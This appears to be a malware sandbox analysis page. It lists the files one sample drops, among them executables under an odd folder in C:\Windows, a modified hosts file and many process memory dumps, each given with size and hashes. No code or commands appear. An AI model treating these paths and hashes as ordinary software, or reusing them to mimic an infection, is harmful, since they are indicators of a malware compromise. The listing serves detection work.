Filesize
9.5MB

MD5
7cecfbdbff67e9ffb52601684f1a5e92

SHA1
6ba5debb40ab7c318497ee9a89dc20dfbae7c79c

SHA256
1e7c0c8d61ea9c43826ce5d1088fb049ec0084c2d3ea5803f721942826eb9e17

SHA512
2c41f52cb03dc67be6de198e91ce0953910394ef73c7bac6aebca409c282f0def4e226e35f390972c4024c136c8b1343c497bfe9eed0b699d40ff3be38ece498

Download Submit
C:\Windows\nblmptktz\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\nblmptktz\etgfqftjv\Result.txt

Filesize
2KB

MD5
171f61bd2e61a51f0ff231606c8d34e0

SHA1
8151a90f4099901844b428e728426cb00fea8529

SHA256
4af06b7bff7705c67d2f7d2f5cd27344a4eae6af626b7a4457e550a9c3d76e28

SHA512
db52d00b36ff826b8c86d7c7e85cdbbbdadad4f41299931320793e0ff8f461b577299ef05d716ca1b7358b61466460b7175ddee872e3da00aed40a2624efc7bb

Download Submit
C:\Windows\nblmptktz\etgfqftjv\Result.txt

Filesize
2KB

MD5
90dddeb7fc2310095a84c33e6e3db241

SHA1
ba0673b9b51811f5446f1f6fa33d2fd8fee2e61e

SHA256
cf549c040c9cdb3e84371ba44ea91da44d96e4bdd4bb77465419149e32ad9bd0

SHA512
87dc1ce8e34b4201762abedf6301181a3ee13408acb59965b078cd24fa06f084ee11ae0a9bb712e7826ac10d9f6aa034c41c86460cfc5c299a5bea3a228d480a

Download Submit
C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\nblmptktz\etgfqftjv\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
memory/904-218-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/1344-174-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/1476-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/1476-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/2296-232-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/2320-184-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/2432-141-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/2432-156-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/2452-247-0x0000000000BF0000-0x0000000000C02000-memory.dmp

Filesize
72KB

Download
memory/2476-170-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/2544-235-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/2588-78-0x0000000001400000-0x000000000144C000-memory.dmp

Filesize
304KB

Download
memory/2736-148-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/2736-161-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3020-222-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/3156-179-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/3840-136-0x00007FF7913D0000-0x00007FF7914BE000-memory.dmp

Filesize
952KB

Download
memory/3840-137-0x00007FF7913D0000-0x00007FF7914BE000-memory.dmp

Filesize
952KB

Download
memory/3924-205-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/3964-201-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/4060-230-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/4160-196-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/4396-237-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/4776-213-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/4800-181-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-248-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-381-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-224-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-215-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-233-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-378-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-164-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-177-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-377-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-256-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-267-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4800-167-0x000001FC08920000-0x000001FC08930000-memory.dmp

Filesize
64KB

Download
memory/4800-198-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp

Filesize
1.1MB

Download
memory/4840-188-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/4956-192-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download
memory/5080-227-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp

Filesize
364KB

Download